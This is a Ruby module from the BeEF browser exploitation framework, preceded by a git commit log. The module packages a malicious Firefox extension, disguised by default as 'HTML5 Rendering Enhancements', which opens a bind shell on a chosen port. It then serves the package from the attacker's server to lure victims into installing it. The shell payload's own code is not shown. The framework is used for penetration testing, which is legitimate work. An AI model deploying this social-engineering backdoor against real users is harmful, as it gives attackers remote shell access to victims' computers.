b6425e4a90
* fixed offline zombie not deleting * Bump jsdoc-to-markdown from 6.0.1 to 7.0.1 (#2161) Bumps [jsdoc-to-markdown](https://github.com/jsdoc2md/jsdoc-to-markdown) from 6.0.1 to 7.0.1. - [Release notes](https://github.com/jsdoc2md/jsdoc-to-markdown/releases) - [Commits](https://github.com/jsdoc2md/jsdoc-to-markdown/compare/v6.0.1...v7.0.1) --- updated-dependencies: - dependency-name: jsdoc-to-markdown dependency-type: direct:development update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> * Bug: Core - 1785 Fixed public hook url configuration settings (#2163) * added spec file for testing changes * added local host getter to configuration class * added default value 0.0.0.0 for local host if it's not set * added port config getter with default * added port config getter with default * fixed spelling errors for port * added public configuration values and validation * removed logic from public port as it was not required * added beef host to configuration class * added beef port to configuration class and removed default http.port logic from public_port * fixed rubocop errors and refactored spec tests * added beef host configuration values used for external resources * added beef url to configuration * added spec file for testing changes * added local host getter to configuration class * added default value 0.0.0.0 for local host if it's not set * added port config getter with default * added port config getter with default * fixed spelling errors for port * added public configuration values and validation * removed logic from public port as it was not required * added beef host to configuration class * added beef port to configuration class and removed default http.port logic from public_port * fixed rubocop errors and refactored spec tests * added beef host configuration values used for external resources * added beef url to configuration * created command spec file * add before statement to load all enabled modules to test command class * add spec to check if configuration instance exists by setting and accessing a config variable * updated http proto for beef host * reverting changes on this file, dev values set * removed some unessessary checks * fixed grammar test now we're only testing one configuration attribute * added hook url for contextual usage * refactoring admin_ui with new code usage * fixed issue with the location of the beef.http.https.public_enabled * refactored powershell module and extension * adding the new config setting for public https beign enabled * refactor qrcode extension * replace video fake plugin refactor * social engineering refactoring * phonegap module refactoring * exploit refactoing * network module refactoing * ipec module refactoring * host module refactoring * debug refactoring * browser refactoring * social engineering extension refactoring * core main server refactoring * core main console banner refactoring * removing dev test * fixed area with location of http.https.enabled * changed the hook url definition to return the hook file path * updated banners to use new configuration getters * updated extensions and modules with the hook url change * added new public.host configuration settings and validations for depicated usage of public * updated to use public.port configuration * added validation for old configuration public_port * updated to use public https configuration setting * updated config with new settings format * fixed get to point to new locations * fixed pointer to hook_file_path * Update extensions/social_engineering/web_cloner/web_cloner.rb Co-authored-by: bcoles <bcoles@gmail.com> * updated enabled to enable * making sure default configuration file does not have preset values Co-authored-by: bcoles <bcoles@gmail.com> * bumped versions to 0.5.2.0 * Usability: #2145. Added user input request for beef update within 'beef' install script (#2162) * added user input request for beef update * swaped git pull from system to backticks * flags added for auto update and timout to input * updated install.txt to reference the update-beef script (#2160) Co-authored-by: Andrew Wheatley <a@andrews-mini.home> Co-authored-by: Isaac Powell <36595182+DeezyE@users.noreply.github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: bcoles <bcoles@gmail.com>
87 lines
3.5 KiB
Ruby
87 lines
3.5 KiB
Ruby
#
|
|
# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
|
|
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
# See the file 'doc/COPYING' for copying permission
|
|
#
|
|
class Firefox_extension_bindshell < BeEF::Core::Command
|
|
|
|
class Bind_extension < BeEF::Core::Router::Router
|
|
before do
|
|
headers 'Content-Type' => 'application/x-xpinstall',
|
|
'Pragma' => 'no-cache',
|
|
'Cache-Control' => 'no-cache',
|
|
'Expires' => '0'
|
|
end
|
|
|
|
get '/' do
|
|
response['Content-Type'] = "application/x-xpinstall"
|
|
extension_path = settings.extension_path
|
|
print_info "Serving malicious Firefox Extension (Bindshell): #{extension_path}"
|
|
send_file "#{extension_path}",
|
|
:type => 'application/x-xpinstall',
|
|
:disposition => 'inline'
|
|
end
|
|
end
|
|
|
|
def pre_send
|
|
|
|
# gets the value configured in the module configuration by the user
|
|
@datastore.each do |input|
|
|
if input['name'] == "extension_name"
|
|
@extension_name = input['value']
|
|
end
|
|
if input['name'] == "xpi_name"
|
|
@xpi_name = input['value']
|
|
end
|
|
if input['name'] == "lport"
|
|
@lport = input['value']
|
|
end
|
|
end
|
|
|
|
mod_path = "#{$root_dir}/modules/social_engineering/firefox_extension_bindshell"
|
|
extension_path = mod_path + "/extension"
|
|
|
|
# clean the build directory
|
|
FileUtils.rm_rf("#{extension_path}/build/.", secure: true)
|
|
|
|
# copy in the build directory necessary file, substituting placeholders
|
|
File.open(extension_path + "/build/install.rdf", "w") {|file| file.puts File.read(extension_path + "/install.rdf").gsub!("__extension_name_placeholder__", @extension_name)}
|
|
File.open(extension_path + "/build/bootstrap.js", "w") {|file| file.puts File.read(extension_path + "/bootstrap.js").gsub!("__bindshell_port_placeholder__", @lport)}
|
|
File.open(extension_path + "/build/overlay.xul", "w") {|file| file.puts File.read(extension_path + "/overlay.xul")}
|
|
File.open(extension_path + "/build/chrome.manifest", "w") {|file| file.puts File.read(extension_path + "/chrome.manifest")}
|
|
|
|
extension_content = ["install.rdf", "bootstrap.js", "overlay.xul", "chrome.manifest"]
|
|
|
|
# create the XPI extension container
|
|
xpi = "#{extension_path}/#{@xpi_name}.xpi"
|
|
if File.exist?(xpi)
|
|
File.delete(xpi)
|
|
end
|
|
Zip::File.open(xpi, Zip::File::CREATE) do |xpi|
|
|
extension_content.each do |filename|
|
|
xpi.add(filename, "#{extension_path}/build/#{filename}")
|
|
end
|
|
end
|
|
|
|
# mount the extension in the BeEF web server, calling a specific nested class (needed because we need a specific content-type/disposition)
|
|
bind_extension = Firefox_extension_bindshell::Bind_extension
|
|
bind_extension.set :extension_path, "#{$root_dir}/modules/social_engineering/firefox_extension_bindshell/extension/#{@xpi_name}.xpi"
|
|
BeEF::Core::Server.instance.mount("/#{@xpi_name}.xpi", bind_extension.new)
|
|
BeEF::Core::Server.instance.remap
|
|
end
|
|
|
|
def self.options
|
|
@configuration = BeEF::Core::Configuration.instance
|
|
beef_host = @configuration.beef_host
|
|
return [
|
|
{'name' => 'extension_name', 'ui_label' => 'Extension name', 'value' => 'HTML5 Rendering Enhancements'},
|
|
{'name' => 'xpi_name', 'ui_label' => 'Extension file (XPI) name', 'value' => 'HTML5_Enhancements'},
|
|
{'name' => 'lport', 'ui_label' => 'Listen Port', 'value' => '1337'}
|
|
]
|
|
end
|
|
|
|
def post_execute
|
|
save({'result' => @datastore['result']})
|
|
end
|
|
end
|